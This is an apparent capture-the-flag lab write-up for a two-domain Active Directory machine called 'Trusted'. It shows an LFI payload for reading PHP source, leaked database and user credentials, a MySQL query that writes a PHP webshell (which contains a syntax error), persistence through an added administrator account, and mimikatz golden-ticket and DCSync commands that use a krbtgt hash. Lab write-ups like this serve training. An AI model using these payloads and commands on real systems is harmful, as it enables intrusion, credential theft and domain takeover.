🤝Trusted

You will learn about getting a foothold through a web vulnerability, escalating privileges and then moving laterally between domains

IPs in scope:

10.10.232.181
10.10.232.182

Enumeration

These two machines are two domain controllers for two different domains

They probably have a trust relation trusteddc.trusted.vl

labdc.lab.trusted.vl

This machine has XAMPP and MySQL

With Gobuster we find a /dev directory with a php page that is vulnerable to LFI

This reveals nothing of interest

Enumerating the /dev directory we find a db.php file

We can use the LFI to display this php file by encoding it in base64

http://10.10.232.182/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\\xampp\\htdocs\\dev\\db.php

root:SuperSecureMySQLPassw0rd1337. In the news database we can find the users and hashed passwords

rsmith:IHateEric2 We cannot login with RDP and we don't find anything interesting in the shares

We can upload a php webshell via the MySQL shell

select '<?php $cmd=$_GET=$["cmd"];system($cmd);?>' INTO OUTFILE 'C:\\xampp\\htdocs\\dev\\shell.php';

Then i use a powershell reverse shell to get a shell back on my machine

Then i upgraded to a beacon

I created persitance by adding an account to the Administrator group

Exploiting domain trust

Now to check the domain trust we can use PowerView

To abuse the bidirectional trust we can create a Golden Ticket and DCSync the root Domain controller

lab.trusted.vl
S-1-5-21-2241985869-2159962460-1278545866

trusted.vl
S-1-5-21-3576695518-347000760-3731839591

Enterprise Admins
S-1-5-21-3576695518-347000760-3731839591-519

krbtgt
c7a03c565c68c6fac5f8913fab576ebd

Now we craft and inject a Golden Ticket

mimikatz # kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt

We now DCSync the root domain controller and we get the hash of the Administrator

mimikatz # lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

Note: all of this needs to be done using a Graphical session with RDP or VNC WinRM does not work.

PreviousDataNextBaby

Last updated

Was this helpful?